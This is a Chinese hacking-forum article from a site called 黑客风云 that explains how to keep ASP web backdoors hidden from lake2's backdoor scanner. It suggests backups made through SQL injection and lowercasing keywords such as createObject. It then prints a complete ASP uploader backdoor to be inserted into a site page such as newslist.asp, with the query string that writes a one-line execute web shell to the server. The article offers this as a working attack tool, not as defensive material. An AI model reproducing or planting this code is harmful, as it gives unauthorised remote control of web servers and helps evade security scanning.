黑客风云——风云网络
设为首页 加入收藏 我要投稿 网站地图

您现在的位置: 黑客风云 >> 黑客文章 >> 黑客进阶 >> 木马天地 >> 正文
·没有路由密码权限时的鸽08-23·上网安全 Vista自我防范10-11
·让濒临崩溃的Windows XP10-11·有备无患,快速自制救急10-11
·要你好看!Windows看图工10-11·空间赞助网提供不同类型10-11
·讨论net.exe和net1.exe的10-10·让3389远程桌面传输更通10-10
·巧妙入侵渗透赌博站10-10·Aspx空间扫权限工具10-10
·Windows2003最新提权工具10-10·易淘乐提供100M免费全能10-10
·系统开机密码忘了不着急10-09·中意网络提供免费100M免10-09
·与众不同 Windows XP开始10-08·让桌面图标翻跟斗 在XP上10-08
·上海宽元站长资助计划-提10-08·个性化Windows XP的任务10-07
·趣盘提供3G免费网络硬盘10-07·秀山热线提供200MB免费全10-07
·一次艰辛的提权过程10-06·成功入侵IT大卖场的渗透10-06
·mysqlhack- MYSQL利用工10-06·lanker一句话PHP后门客户10-06
·WIXI提供3G免费多媒体网10-06·新人网络提供100M/ftp免10-06
·如何利用QQ带来高流量10-05·UuShare提供免费网络文件10-05
[推荐]Web后门经验谈
      ★★★★★

Web后门经验谈

文章整理发布:黑客风云 文章来源:www.05112.com 更新时间:2006-7-12 8:22:47

自从lake2出了后门扫马程序以后,后门的存活率可就大大的减少了,唉,没办法,谁叫人家这么厉害呢,一个程序搞定那么多的小马,可怜菜鸟们了,好不容易留下的后门一下子全被暴露无疑了。这个扫马程序也是很厉害,不过在我的很多测试中,发现了不少lake2扫马程序发现不了的后门,也许lake2得将这个后门改改了,改得更先进一点为好。下面就我的个人经验来谈谈如何躲过lake2的扫马程序。

首先,第一种不被发现的后门是能过SQL注射工具利用db_owner权限备份出来的后门。那还是在一次入侵中发现的,我备份小马后,又上传了扫马程序,想将其它黑客的后门删掉,结果无意中发现这个后门居然没有被扫出来,真是幸运啊,后来我就收藏了这个备份的小马,以后的入侵中也被我当成了一个后门程序来用,呵呵。

其次,改下关键字的大小写就可以躲过了,比如我在一次试验中,将关键字"createObject"全部写成了小写"createobject",当然也可以大小交替,结果又意外地发现扫马程序没有扫出来,所以无论是小马,还是大马,我都采用小写的形式,当然,这样写是不会影响程序的功能的。

第三,通过第二步,做一个自己的小马,这个我已经做好了,代码如下(注意其中的creatobject作了大小写处理):

--------------------------------------------------------------------------------
<%
’code by locus,welcome to http://locus.blog.sohu.com
On Error Resume Next
IF Request("act")="creatshell" then
set gl=server.createObJeCt("Adodb.Stream") 
gl.Open 
gl.Type=2
gl.CharSet="gb2312" 
gl.writetext request("shellcode")
gl.SaveToFile server.mappath(request("shellpath")),2 
gl.Close 
set gl=nothing 
response.redirect request("shellpath")
end if
%>
--------------------------------------------------------------------------------

代码虽然大了些,比不上那些精简的小马,但却也是一种简单的后门吧,使用方法如下:比如我们将这些代码放到newslist.asp里,那么只要我们输入newslist.asp?act=creatshell&shellcode=hello&shellpath=locus.asp,那么我们就可以在与newslist.asp同目录下生成一个locus.asp的文件,内容为"hello",于是我们只要改变shellcode的内容,就可以得到一个shell,比如输入shellcode=<%25execute request("locus")%25>,我们就得到一个一句话后门了,而且这个简单的后门能躲过lake2的扫马程序。

也许还有其它方法,但我还没发现,等发现了再补充啦,呵呵。

文章录入:cainiaowang    责任编辑:cainiaowang 
【字体:
Copyright @2006 黑客风云 ●业务联系:QQ 联系怪人 联系奇人 Email:给怪人发邮件 给奇人发邮件
ICP备案:冀06009886